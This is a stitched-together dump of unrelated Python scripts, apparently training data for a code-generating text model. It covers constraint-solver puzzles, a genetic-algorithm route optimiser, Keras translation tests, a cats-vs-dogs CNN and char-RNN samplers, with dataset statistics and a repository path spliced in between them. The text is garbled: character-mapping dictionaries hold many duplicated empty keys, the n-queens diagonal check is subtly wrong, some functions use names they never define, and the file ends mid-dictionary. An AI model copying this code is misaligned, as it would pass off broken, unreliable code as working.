# x-averaged tracer field
self.thm = self.th.mean(axis=1)
#self.thmh = np.fft.rfft(self.thm)
#self.thm_y = np.fft.irfft(1j*self.kk*self.thmh)
# anomaly about the x-averaged field
self.tha = self.th-self.thm[...,np.newaxis]
self.thah = np.fft.rfft2(self.tha)
# x-averaged gradient squared
gradx = np.fft.irfft2(1j*self.k*self.thah)
grady = np.fft.irfft2(1j*self.l*self.thah)
self.gradth2m = (gradx**2 + grady**2).mean(axis=1)
# Osborn-Cox amplification factor
#self.thm_y = 4*np.sin(self.y*self.dl)
#thm_y = self.block_average(self.thm_y)
#gradth2m = self.block_average(self.gradth2m)
#self.A2_OC = gradth2m / thm_y**2
#self.A2_OC[thm_y < 1.e-14] = np.nan
# triple term
self.vth2m = (self.v*(self.tha**2)).mean(axis=1)
# diff transport
self.th2m = (self.tha**2).mean(axis=1)
def get_diagnostic(self, dname):
return (self.diagnostics[dname]['value'] /
self.diagnostics[dname]['count'])
def spec_var(self, ph):
""" compute variance of p from Fourier coefficients ph """
var_dens = 2. * np.abs(ph)**2 / self.M**2
# only half of coefs [0] and [nx/2+1] due to symmetry in real fft2
var_dens[...,0] = var_dens[...,0]/2.
var_dens[...,-1] = var_dens[...,-1]/2.
return var_dens.sum()
def block_average(self,A, nblocks = 256):
""" Block average A onto A blocks """
nave = self.nx/nblocks
Ab = np.empty(nblocks)
for i in range(nblocks):
Ab[i] = A[i*nave:(i+1)*nave].mean()
return Ab
#grad2 = (wv2*(np.abs(thh)**2)).sum()/(N**2)
# a test initial concentration
#x0,y0 = pi,pi
#r = np.sqrt((x-x0)[np.newaxis,...]**2+(y-y0)[...,np.newaxis]**2)
#th = np.zeros(N,N)
#th = np.exp(-(r**2))
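# A minimal usage sketch (illustrative only, not part of the original experiments):
# the class never initialises the tracer field itself, so set `th` by hand before
# stepping, then collect snapshots with run_with_snapshots. The parameter values
# below are assumptions chosen for a quick test, not the experiment settings.
#m = LatticeModel(nx=64, nmin=5, nmax=32, dt=0.25, tmax=10., tavestart=5., kappa=1.e-4)
#m.th = np.zeros((m.ny, m.nx))
#for t in m.run_with_snapshots(tsnapstart=0., tsnap=1.):
#    print(t, m.spec_var(np.fft.rfft2(m.th)))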
| 31.189295
| 85
| 0.544054
| 3,203
| 23,891
| 3.963472
| 0.103341
| 0.049626
| 0.021426
| 0.024262
| 0.959039
| 0.954234
| 0.94486
| 0.94486
| 0.94486
| 0.941788
| 0
| 0.020282
| 0.314847
| 23,891
| 765
| 86
| 31.230065
| 0.755269
| 0.179105
| 0
| 0.924731
| 0
| 0
| 0.045709
| 0
| 0
| 0
| 0
| 0
| 0.008602
| 1
| 0.088172
| false
| 0.006452
| 0.006452
| 0.004301
| 0.116129
| 0.012903
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4a022a6319b9423c35a6989ab9a751215b2aaf76
| 854,077
|
py
|
Python
|
machine-learning/nlp/text-generator/data/python_code.py
|
gizzmo25/pythoncode-tutorials
|
39a413fc1da232ad6de7e5f1e8955564dc65448e
|
[
"MIT"
] | null | null | null |
machine-learning/nlp/text-generator/data/python_code.py
|
gizzmo25/pythoncode-tutorials
|
39a413fc1da232ad6de7e5f1e8955564dc65448e
|
[
"MIT"
] | null | null | null |
machine-learning/nlp/text-generator/data/python_code.py
|
gizzmo25/pythoncode-tutorials
|
39a413fc1da232ad6de7e5f1e8955564dc65448e
|
[
"MIT"
] | null | null | null |
from constraint import Problem, Domain, AllDifferentConstraint
import matplotlib.pyplot as plt
import numpy as np
def _get_pairs(variables):
work = list(variables)
pairs = [ (work[i], work[i+1]) for i in range(len(work)-1) ]
return pairs
def n_queens(n=8):
def not_in_diagonal(a, b):
# queens must not share a diagonal in either direction
result = True
for i in range(1, n):
result = result and ( a != b + i ) and ( a != b - i )
return result
problem = Problem()
variables = { f'x{i}' for i in range(n) }
problem.addVariables(variables, Domain(set(range(1, n+1))))
problem.addConstraint(AllDifferentConstraint())
for pair in _get_pairs(variables):
problem.addConstraint(not_in_diagonal, pair)
return problem.getSolutions()
def magic_square(n=3):
def all_equal(*variables):
square = np.reshape(variables, (n, n))
diagonal = sum(np.diagonal(square))
b = True
for i in range(n):
b = b and sum(square[i, :]) == diagonal
b = b and sum(square[:, i]) == diagonal
if b:
print(square)
return b
problem = Problem()
variables = { f'x{i}{j}' for i in range(1, n+1) for j in range(1, n+1) }
problem.addVariables(variables, Domain(set(range(1, (n**2 + 2)))))
problem.addConstraint(all_equal, variables)
problem.addConstraint(AllDifferentConstraint())
return problem.getSolutions()
def plot_queens(solutions):
for solution in solutions:
for row, column in solution.items():
x = int(row.lstrip('x'))
y = column
plt.scatter(x, y, s=70)
plt.grid()
plt.show()
if __name__ == "__main__":
# solutions = n_queens(n=12)
# print(solutions)
# plot_queens(solutions)
solutions = magic_square(n=4)
for solution in solutions:
print(solution)
import numpy as np
import random
import operator
import pandas as pd
import matplotlib.pyplot as plt
import seaborn
from matplotlib import animation
from realtime_plot import realtime_plot
from threading import Thread, Event
from time import sleep
seaborn.set_style("dark")
stop_animation = Event()
# def animate_cities_and_routes():
# global route
# def wrapped():
# # create figure
# sleep(3)
# print("thread:", route)
# figure = plt.figure(figsize=(14, 8))
# ax1 = figure.add_subplot(1, 1, 1)
# def animate(i):
# ax1.title.set_text("Real time routes")
# for city in route:
# ax1.scatter(city.x, city.y, s=70, c='b')
# ax1.plot([ city.x for city in route ], [city.y for city in route], c='r')
# animation.FuncAnimation(figure, animate, interval=100)
# plt.show()
# t = Thread(target=wrapped)
# t.start()
def plot_routes(initial_route, final_route):
_, ax = plt.subplots(nrows=1, ncols=2)
for col, route in zip(ax, [("Initial Route", initial_route), ("Final Route", final_route) ]):
col.title.set_text(route[0])
route = route[1]
for city in route:
col.scatter(city.x, city.y, s=70, c='b')
col.plot([ city.x for city in route ], [city.y for city in route], c='r')
col.plot([route[-1].x, route[0].x], [route[-1].y, route[0].y], c='r')
plt.show()
def animate_progress():
global route
global progress
global stop_animation
def animate():
# figure = plt.figure()
# ax1 = figure.add_subplot(1, 1, 1)
figure, ax1 = plt.subplots(nrows=1, ncols=2)
while True:
ax1[0].clear()
ax1[1].clear()
# current routes and cities
ax1[0].title.set_text("Current routes")
for city in route:
ax1[0].scatter(city.x, city.y, s=70, c='b')
ax1[0].plot([ city.x for city in route ], [city.y for city in route], c='r')
ax1[0].plot([route[-1].x, route[0].x], [route[-1].y, route[0].y], c='r')
# current distance graph
ax1[1].title.set_text("Current distance")
ax1[1].plot(progress)
ax1[1].set_ylabel("Distance")
ax1[1].set_xlabel("Generation")
plt.pause(0.05)
if stop_animation.is_set():
break
plt.show()
Thread(target=animate).start()
class City:
def __init__(self, x, y):
self.x = x
self.y = y
def distance(self, city):
"""Returns distance between self city and city"""
x = abs(self.x - city.x)
y = abs(self.y - city.y)
return np.sqrt(x ** 2 + y ** 2)
def __sub__(self, city):
return self.distance(city)
def __repr__(self):
return f"({self.x}, {self.y})"
def __str__(self):
return self.__repr__()
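# quick sanity check of the Euclidean metric above (illustrative only): a 3-4-5
# right triangle should give a distance of exactly 5
assert City(0, 0) - City(3, 4) == 5.0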
class Fitness:
def __init__(self, route):
self.route = route
def distance(self):
distance = 0
for i in range(len(self.route)):
from_city = self.route[i]
to_city = self.route[i+1] if i+1 < len(self.route) else self.route[0]
distance += (from_city - to_city)
return distance
def fitness(self):
return 1 / self.distance()
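# worked example with assumed coordinates: for a route of three cities at (0, 0),
# (3, 0) and (3, 4), Fitness.distance closes the tour back to the start, giving
# 3 + 4 + 5 = 12, so Fitness(route).fitness() returns 1/12.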
def generate_cities(size):
cities = []
for i in range(size):
x = random.randint(0, 200)
y = random.randint(0, 200)
if 40 < x < 160:
if 0.5 <= random.random():
y = random.randint(0, 40)
else:
y = random.randint(160, 200)
elif 40 < y < 160:
if 0.5 <= random.random():
x = random.randint(0, 40)
else:
x = random.randint(160, 200)
cities.append(City(x, y))
return cities
# return [ City(x=random.randint(0, 200), y=random.randint(0, 200)) for i in range(size) ]
def create_route(cities):
return random.sample(cities, len(cities))
def initial_population(popsize, cities):
return [ create_route(cities) for i in range(popsize) ]
def sort_routes(population):
"""This function calculates the fitness of each route in population
And returns a population sorted by its fitness in descending order"""
result = [ (i, Fitness(route).fitness()) for i, route in enumerate(population) ]
return sorted(result, key=operator.itemgetter(1), reverse=True)
def selection(population, elite_size):
sorted_pop = sort_routes(population)
df = pd.DataFrame(np.array(sorted_pop), columns=["Index", "Fitness"])
# calculates the cumulative sum
# example:
# [5, 6, 7] => [5, 11, 18]
df['cum_sum'] = df['Fitness'].cumsum()
# calculates the cumulative percentage
# example:
# [5, 6, 7] => [5/18, 11/18, 18/18]
# [5, 6, 7] => [27.77%, 61.11%, 100%]
df['cum_perc'] = 100 * df['cum_sum'] / df['Fitness'].sum()
result = [ sorted_pop[i][0] for i in range(elite_size) ]
for i in range(len(sorted_pop) - elite_size):
pick = random.random() * 100
for i in range(len(sorted_pop)):
if pick <= df['cum_perc'][i]:
result.append(sorted_pop[i][0])
break
return [ population[index] for index in result ]
def breed(parent1, parent2):
child1, child2 = [], []
gene_A = random.randint(0, len(parent1))
gene_B = random.randint(0, len(parent2))
start_gene = min(gene_A, gene_B)
end_gene = max(gene_A, gene_B)
for i in range(start_gene, end_gene):
child1.append(parent1[i])
child2 = [ item for item in parent2 if item not in child1 ]
return child1 + child2
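# illustrative trace with hypothetical parents: if parent1 = [A, B, C, D] and the random
# slice covers indices 1..2, child1 = [B, C]; child2 then keeps the remaining cities of
# parent2 in their original order, so the combined child visits every city exactly once.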
def breed_population(selection, elite_size):
pool = random.sample(selection, len(selection))
# for i in range(elite_size):
# children.append(selection[i])
children = [selection[i] for i in range(elite_size)]
children.extend([breed(pool[i], pool[len(selection)-i-1]) for i in range(len(selection) - elite_size)])
# for i in range(len(selection) - elite_size):
# child = breed(pool[i], pool[len(selection)-i-1])
# children.append(child)
return children
def mutate(route, mutation_rate):
route_length = len(route)
for swapped in range(route_length):
if(random.random() < mutation_rate):
swap_with = random.randint(0, route_length-1)
route[swapped], route[swap_with] = route[swap_with], route[swapped]
return route
def mutate_population(population, mutation_rate):
return [ mutate(route, mutation_rate) for route in population ]
def next_gen(current_gen, elite_size, mutation_rate):
select = selection(population=current_gen, elite_size=elite_size)
children = breed_population(selection=select, elite_size=elite_size)
return mutate_population(children, mutation_rate)
def genetic_algorithm(cities, popsize, elite_size, mutation_rate, generations, plot=True, prn=True):
global route
global progress
population = initial_population(popsize=popsize, cities=cities)
if plot:
animate_progress()
sorted_pop = sort_routes(population)
initial_route = population[sorted_pop[0][0]]
distance = 1 / sorted_pop[0][1]
if prn:
print(f"Initial distance: {distance}")
try:
if plot:
progress = [ distance ]
for i in range(generations):
population = next_gen(population, elite_size, mutation_rate)
sorted_pop = sort_routes(population)
distance = 1 / sorted_pop[0][1]
progress.append(distance)
if prn:
print(f"[Generation:{i}] Current distance: {distance}")
route = population[sorted_pop[0][0]]
else:
for i in range(generations):
population = next_gen(population, elite_size, mutation_rate)
distance = 1 / sort_routes(population)[0][1]
if prn:
print(f"[Generation:{i}] Current distance: {distance}")
except KeyboardInterrupt:
pass
stop_animation.set()
final_route_index = sort_routes(population)[0][0]
final_route = population[final_route_index]
if prn:
print("Final route:", final_route)
return initial_route, final_route, distance
if __name__ == "__main__":
cities = generate_cities(25)
initial_route, final_route, distance = genetic_algorithm(cities=cities, popsize=120, elite_size=19, mutation_rate=0.0019, generations=1800)
# plot_routes(initial_route, final_route)
import numpy
import matplotlib.pyplot as plt
import cv2
from PIL import Image
from multiprocessing import Process
def fig2img ( fig ):
"""
brief Convert a Matplotlib figure to a PIL Image in RGB format and return it
param fig a matplotlib figure
return a Python Imaging Library ( PIL ) image
"""
# put the figure pixmap into a numpy array
buf = fig2data ( fig )
h, w, d = buf.shape
return Image.frombytes( "RGB", ( w, h ), buf.tobytes( ) )
def fig2data ( fig ):
"""
brief Convert a Matplotlib figure to a 3D numpy array with RGB channels and return it
param fig a matplotlib figure
return a numpy 3D array of RGB values
"""
# draw the renderer
fig.canvas.draw ( )
# Get the RGB buffer from the figure; rows come first, so reshape to (height, width, 3)
w, h = fig.canvas.get_width_height()
buf = numpy.frombuffer ( fig.canvas.tostring_rgb(), dtype=numpy.uint8 )
buf = buf.reshape( ( h, w, 3 ) ).copy()
return buf
if __name__ == "__main__":
pass
# figure = plt.figure()
# plt.plot([3, 5, 9], [3, 19, 23])
# img = fig2img(figure)
# img.show()
# while True:
# frame = numpy.array(img)
# # Convert RGB to BGR
# frame = frame[:, :, ::-1].copy()
# print(frame)
# cv2.imshow("test", frame)
# if cv2.waitKey(0) == ord('q'):
# break
# cv2.destroyAllWindows()
def realtime_plot(route):
figure = plt.figure(figsize=(14, 8))
plt.title("Real time routes")
for city in route:
plt.scatter(city.x, city.y, s=70, c='b')
plt.plot([ city.x for city in route ], [city.y for city in route], c='r')
img = numpy.array(fig2img(figure))
cv2.imshow("test", img)
if cv2.waitKey(1) == ord('q'):
cv2.destroyAllWindows()
plt.close(figure)
from genetic import genetic_algorithm, generate_cities, City
import operator
def load_cities():
return [ City(city[0], city[1]) for city in [(169, 20), (103, 24), (41, 9), (177, 76), (138, 173), (163, 108), (93, 34), (200, 84), (19, 184), (117, 176), (153, 30), (140, 29), (38, 108), (89, 183), (18, 4), (174, 38), (109, 169), (93, 23), (156, 10), (171, 27), (164, 91), (109, 194), (90, 169), (115, 37), (177, 93), (169, 20)] ]
def train():
cities = load_cities()
generations = 1000
popsizes = [60, 100, 140, 180]
elitesizes = [5, 15, 25, 35, 45]
mutation_rates = [0.0001, 0.0005, 0.001, 0.005, 0.01]
total_iterations = len(popsizes) * len(elitesizes) * len(mutation_rates)
iteration = 0
tries = {}
for popsize in popsizes:
for elite_size in elitesizes:
for mutation_rate in mutation_rates:
iteration += 1
init_route, final_route, distance = genetic_algorithm( cities=cities,
popsize=popsize,
elite_size=elite_size,
mutation_rate=mutation_rate,
generations=generations,
plot=False,
prn=False)
progress = iteration / total_iterations
percentage = progress * 100
print(f"[{percentage:5.2f}%] [Iteration:{iteration:3}/{total_iterations:3}] [popsize={popsize:3} elite_size={elite_size:2} mutation_rate={mutation_rate:7}] Distance: {distance:4}")
tries[(popsize, elite_size, mutation_rate)] = distance
min_gen = min(tries.values())
reversed_tries = { v:k for k, v in tries.items() }
best_combination = reversed_tries[min_gen]
print("Best combination:", best_combination)
if __name__ == "__main__":
train()
# best parameters
# popsize elitesize mutation_rate
# 90 25 0.0001
# 110 10 0.001
# 130 10 0.005
# 130 20 0.001
# 150 25 0.001
import os
def load_data(path):
"""
Load dataset
"""
input_file = os.path.join(path)
with open(input_file, "r") as f:
data = f.read()
return data.split('\n')
import numpy as np
from keras.losses import sparse_categorical_crossentropy
from keras.models import Sequential
from keras.preprocessing.text import Tokenizer
from keras.utils import to_categorical
def _test_model(model, input_shape, output_sequence_length, french_vocab_size):
if isinstance(model, Sequential):
model = model.model
assert model.input_shape == (None, *input_shape[1:]),\
'Wrong input shape. Found input shape {} using parameter input_shape={}'.format(model.input_shape, input_shape)
assert model.output_shape == (None, output_sequence_length, french_vocab_size),\
'Wrong output shape. Found output shape {} using parameters output_sequence_length={} and french_vocab_size={}'\
.format(model.output_shape, output_sequence_length, french_vocab_size)
assert len(model.loss_functions) > 0,\
'No loss function set. Apply the compile function to the model.'
assert sparse_categorical_crossentropy in model.loss_functions,\
'Not using sparse_categorical_crossentropy function for loss.'
def test_tokenize(tokenize):
sentences = [
'The quick brown fox jumps over the lazy dog .',
'By Jove , my quick study of lexicography won a prize .',
'This is a short sentence .']
tokenized_sentences, tokenizer = tokenize(sentences)
assert tokenized_sentences == tokenizer.texts_to_sequences(sentences),\
'Tokenizer returned and doesn\'t generate the same sentences as the tokenized sentences returned. '
def test_pad(pad):
tokens = [
[i for i in range(4)],
[i for i in range(6)],
[i for i in range(3)]]
padded_tokens = pad(tokens)
padding_id = padded_tokens[0][-1]
true_padded_tokens = np.array([
[i for i in range(4)] + [padding_id]*2,
[i for i in range(6)],
[i for i in range(3)] + [padding_id]*3])
assert isinstance(padded_tokens, np.ndarray),\
'Pad returned the wrong type. Found {} type, expected numpy array type.'
assert np.all(padded_tokens == true_padded_tokens), 'Pad returned the wrong results.'
padded_tokens_using_length = pad(tokens, 9)
assert np.all(padded_tokens_using_length == np.concatenate((true_padded_tokens, np.full((3, 3), padding_id)), axis=1)),\
'Using length argument return incorrect results'
def test_simple_model(simple_model):
input_shape = (137861, 21, 1)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = simple_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
def test_embed_model(embed_model):
input_shape = (137861, 21)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = embed_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
def test_encdec_model(encdec_model):
input_shape = (137861, 15, 1)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = encdec_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
def test_bd_model(bd_model):
input_shape = (137861, 21, 1)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = bd_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
def test_model_final(model_final):
input_shape = (137861, 15)
output_sequence_length = 21
english_vocab_size = 199
french_vocab_size = 344
model = model_final(input_shape, output_sequence_length, english_vocab_size, french_vocab_size)
_test_model(model, input_shape, output_sequence_length, french_vocab_size)
CATEGORIES = ["Dog", "Cat"]
IMG_SIZE = 100
DATADIR = r"C:\Users\STRIX\Desktop\CatnDog\PetImages"
TRAINING_DIR = r"E:\datasets\CatnDog\Training"
TESTING_DIR = r"E:\datasets\CatnDog\Testing"
import cv2
import tensorflow as tf
import os
import numpy as np
import random
from settings import *
from tqdm import tqdm
# CAT_PATH = r"C:\Users\STRIX\Desktop\CatnDog\Testing\Cat"
# DOG_PATH = r"C:\Users\STRIX\Desktop\CatnDog\Testing\Dog"
MODEL = "Cats-vs-dogs-new-6-0.90-CNN"
def prepare_image(path):
image = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
image = cv2.resize(image, (IMG_SIZE, IMG_SIZE))
return image
# img = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
# img = cv2.resize(img, (IMG_SIZE, IMG_SIZE))
# return img.reshape(-1, IMG_SIZE, IMG_SIZE, 1)
def load_model():
return tf.keras.models.load_model(f"{MODEL}.model")
def predict(img):
prediction = model.predict([prepare_image(img)])[0][0]
return int(prediction)
if __name__ == "__main__":
model = load_model()
x_test, y_test = [], []
for code, category in enumerate(CATEGORIES):
path = os.path.join(TESTING_DIR, category)
for img in tqdm(os.listdir(path), "Loading images:"):
# result = predict(os.path.join(path, img))
# if result == code:
# correct += 1
# total += 1
# testing_data.append((os.path.join(path, img), code))
x_test.append(prepare_image(os.path.join(path, img)))
y_test.append(code)
x_test = np.array(x_test).reshape(-1, IMG_SIZE, IMG_SIZE, 1)
# random.shuffle(testing_data)
# total = 0
# correct = 0
# for img, code in testing_data:
# result = predict(img)
# if result == code:
# correct += 1
# total += 1
# accuracy = (correct/total) * 100
# print(f"{correct}/{total} Total Accuracy: {accuracy:.2f}%")
# print(x_test)
# print("="*50)
# print(y_test)
print(model.evaluate([x_test], y_test))
print(model.metrics_names)
import numpy as np
import matplotlib.pyplot as plt
import cv2
import os
# import cv2
from tqdm import tqdm
import random
from settings import *
# for the first time only
# for category in CATEGORIES:
# directory = os.path.join(TRAINING_DIR, category)
# os.makedirs(directory)
# # for the first time only
# for category in CATEGORIES:
# directory = os.path.join(TESTING_DIR, category)
# os.makedirs(directory)
# Total images for each category: 12501 image (total 25002)
# def create_data():
# for code, category in enumerate(CATEGORIES):
# path = os.path.join(DATADIR, category)
# for counter, img in enumerate(tqdm(os.listdir(path)), start=1):
# try:
# # absolute path of image
# image = os.path.join(path, img)
# image = cv2.imread(image, cv2.IMREAD_GRAYSCALE)
# image = cv2.resize(image, (IMG_SIZE, IMG_SIZE))
# if counter < 300:
# # testing image
# img = os.path.join(TESTING_DIR, category, img)
# else:
# # training image
# img = os.path.join(TRAINING_DIR, category, img)
# cv2.imwrite(img, image)
# except:
# pass
def load_data(path):
data = []
for code, category in enumerate(CATEGORIES):
p = os.path.join(path, category)
for img in tqdm(os.listdir(p), desc=f"Loading {category} data: "):
img = os.path.join(p, img)
img = cv2.imread(img, cv2.IMREAD_GRAYSCALE)
data.append((img, code))
return data
def load_training_data():
return load_data(TRAINING_DIR)
def load_testing_data():
return load_data(TESTING_DIR)
# # load data
# training_data = load_training_data()
# # # shuffle data
# random.shuffle(training_data)
# X, y = [], []
# for features, label in tqdm(training_data, desc="Splitting the data: "):
# X.append(features)
# y.append(label)
# X = np.array(X).reshape(-1, IMG_SIZE, IMG_SIZE, 1)
# # pickling (images,labels)
# print("Pickling data...")
import pickle
# with open("X.pickle", 'wb') as pickle_out:
# pickle.dump(X, pickle_out)
# with open("y.pickle", 'wb') as pickle_out:
# pickle.dump(y, pickle_out)
def load():
return np.array(pickle.load(open("X.pickle", 'rb'))), pickle.load(open("y.pickle", 'rb'))
print("Loading data...")
X, y = load()
X = X/255 # to make colors from 0 to 1
print("Shape of X:", X.shape)
import tensorflow
from tensorflow.keras.datasets import cifar10
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.callbacks import ModelCheckpoint
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout, Activation, Flatten
from tensorflow.keras.layers import Conv2D, MaxPooling2D
# from tensorflow.keras.callbacks import TensorBoard
print("Imported tensorflow, building model...")
NAME = "Cats-vs-dogs-new-9-{val_acc:.2f}-CNN"
checkpoint = ModelCheckpoint(filepath=f"{NAME}.model", save_best_only=True, verbose=1)
# 3 conv, 64 nodes per layer, 0 dense
model = Sequential()
model.add(Conv2D(32, (2, 2), input_shape=X.shape[1:]))
model.add(Activation('relu'))
model.add(Conv2D(32, (2, 2)))
model.add(Dropout(0.1))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (2, 2)))
model.add(Activation('relu'))
model.add(Conv2D(64, (2, 2)))
model.add(Dropout(0.1))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(96, (2, 2)))
model.add(Activation('relu'))
model.add(Conv2D(96, (2, 2)))
model.add(Dropout(0.1))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(128, (2, 2)))
model.add(Activation('relu'))
model.add(Conv2D(128, (2, 2)))
model.add(Dropout(0.1))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dense(500, activation="relu"))
model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors
model.add(Dense(1))
model.add(Activation('sigmoid'))
model.summary()
print("Compiling model ...")
# tensorboard = TensorBoard(log_dir=f"logs/{NAME}")
model.compile(loss="binary_crossentropy",
optimizer="rmsprop",
metrics=['accuracy'])
print("Training...")
model.fit(X, y, batch_size=64, epochs=30, validation_split=0.2, callbacks=[checkpoint])
### Hyper Parameters ###
batch_size = 256 # Sequences per batch
num_steps = 70 # Number of sequence steps per batch
lstm_size = 256 # Size of hidden layers in LSTMs
num_layers = 2 # Number of LSTM layers
learning_rate = 0.003 # Learning rate
keep_prob = 0.3 # Dropout keep probability
epochs = 20
# Print losses every N interations
print_every_n = 100
# Save every N iterations
save_every_n = 500
NUM_THREADS = 12
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=1,
inter_op_parallelism_threads=1,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
import train_chars
import numpy as np
import keyboard
char2int_target = {'\t': 0, '\n': 1, '\x0c': 2, ' ': 3, '!': 4, '"': 5, '#': 6, '': 7, '%': 8, '&': 9, "'": 10, '(': 11, ')': 12, '*': 13, '+': 14, ',': 15, '-': 16, '.': 17,
'/': 18, '0': 19, '1': 20, '2': 21, '3': 22, '4': 23, '5': 24, '6': 25, '7': 26, '8': 27, '9': 28, ':': 29, '': 30, '<': 31, '=': 32, '>': 33, '?': 34, '':
35, 'A': 36, 'B': 37, 'C': 38, 'D': 39, 'E': 40, 'F': 41, 'G': 42, 'H': 43, 'I': 44, 'J': 45, 'K': 46, 'L': 47, 'M': 48, 'N': 49, 'O': 50, 'P': 51, 'Q': 52, 'R': 53, 'S': 54, 'T': 55, 'U': 56, 'V': 57, 'W': 58, 'X': 59, 'Y': 60, 'Z': 61, '[': 62, '\\': 63, ']': 64, '^': 65, '_': 66, '': 67, 'a': 68, 'b': 69, 'c':
70, 'd': 71, 'e': 72, 'f': 73, 'g': 74, 'h': 75, 'i': 76, 'j': 77, 'k': 78, 'l': 79, 'm': 80, 'n': 81, 'o': 82, 'p': 83, 'q': 84, 'r': 85, 's': 86, 't': 87, 'u': 88, 'v': 89, 'w': 90, 'x': 91, 'y': 92, 'z': 93, '{': 94, '|': 95, '}': 96, '': 97, '': 98, '': 99, '': 100, '': 101, '': 102, '': 103, '': 104, '': 105, '\xad': 106, '': 107, '': 108, '': 109, '': 110, '': 111, '': 112, '': 113, '': 114, '': 115, '': 116, '': 117, '': 118, '': 119, '': 120, '': 121, '': 122, '': 123, '': 124, '': 125, '': 126, '': 127, '': 128, '': 129, '': 130, '': 131, '': 132, '': 133, '': 134, '': 135, '': 136, '': 137, '': 138, '': 139, '': 140, '': 141, '': 142, '': 143, '': 144, '': 145, '': 146, '': 147, '': 148, '': 149, '': 150, '': 151, '': 152, '': 153, '': 154, '': 155, '': 156, '': 157, '': 158, '': 159, '': 160, '': 161, '': 162, '': 163, '': 164, '': 165, '': 166, '': 167,
'': 168, '': 169, '': 170, '': 171, '': 172, '': 173, '': 174, '': 175, '': 176, '': 177, '': 178, '': 179, '': 180, '': 181, '': 182, '': 183, '': 184, '': 185, '': 186, '': 187, '': 188, '': 189, '': 190, '': 191, '': 192}
model = train_chars.CharRNN(len(char2int_target), lstm_size=train_chars.lstm_size, sampling=True)
saver = train_chars.tf.train.Saver()
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
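# illustrative numbers (assumed, not from a trained model): with preds such as
# [0.5, 0.2, 0.1, 0.1, 0.05, 0.05] and top_n=3, everything but the three largest entries
# is zeroed, the remainder is renormalised to sum to 1, and the next character id is
# drawn at random from that truncated distribution.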
def write_sample(checkpoint, lstm_size, vocab_size, char2int, int2char, prime="import"):
# samples = [c for c in prime]
with train_chars.tf.Session() as sess:
saver.restore(sess, checkpoint)
new_state = sess.run(model.initial_state)
for c in prime:
x = np.zeros((1, 1))
x[0,0] = char2int[c]
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
# print("Preds:", preds)
c = pick_top_n(preds, vocab_size)
char = int2char[c]
keyboard.write(char)
time.sleep(0.01)
# samples.append(char)
while True:
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, vocab_size)
char = int2char[c]
keyboard.write(char)
time.sleep(0.01)
# samples.append(char)
# return ''.join(samples)
if __name__ == "__main__":
# checkpoint = train_chars.tf.train_chars.latest_checkpoint("checkpoints")
# print(checkpoint)
checkpoint = "checkpoints/i6291_l256.ckpt"
print()
f = open("generates/python.txt", "a", encoding="utf8")
int2char_target = { v:k for k, v in char2int_target.items() }
import time
time.sleep(2)
write_sample(checkpoint, train_chars.lstm_size, len(char2int_target), char2int_target, int2char_target, prime="#"*100)
# to use CPU
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
config = tf.ConfigProto(intra_op_parallelism_threads=5,
inter_op_parallelism_threads=5,
allow_soft_placement=True,
device_count = {'CPU' : 1,
'GPU' : 0}
)
import train_chars
import numpy as np
char2int_target = {'\t': 0, '\n': 1, '\x0c': 2, ' ': 3, '!': 4, '"': 5, '#': 6, '': 7, '%': 8, '&': 9, "'": 10, '(': 11, ')': 12, '*': 13, '+': 14, ',': 15, '-': 16, '.': 17,
'/': 18, '0': 19, '1': 20, '2': 21, '3': 22, '4': 23, '5': 24, '6': 25, '7': 26, '8': 27, '9': 28, ':': 29, '': 30, '<': 31, '=': 32, '>': 33, '?': 34, '':
35, 'A': 36, 'B': 37, 'C': 38, 'D': 39, 'E': 40, 'F': 41, 'G': 42, 'H': 43, 'I': 44, 'J': 45, 'K': 46, 'L': 47, 'M': 48, 'N': 49, 'O': 50, 'P': 51, 'Q': 52, 'R': 53, 'S': 54, 'T': 55, 'U': 56, 'V': 57, 'W': 58, 'X': 59, 'Y': 60, 'Z': 61, '[': 62, '\\': 63, ']': 64, '^': 65, '_': 66, '': 67, 'a': 68, 'b': 69, 'c':
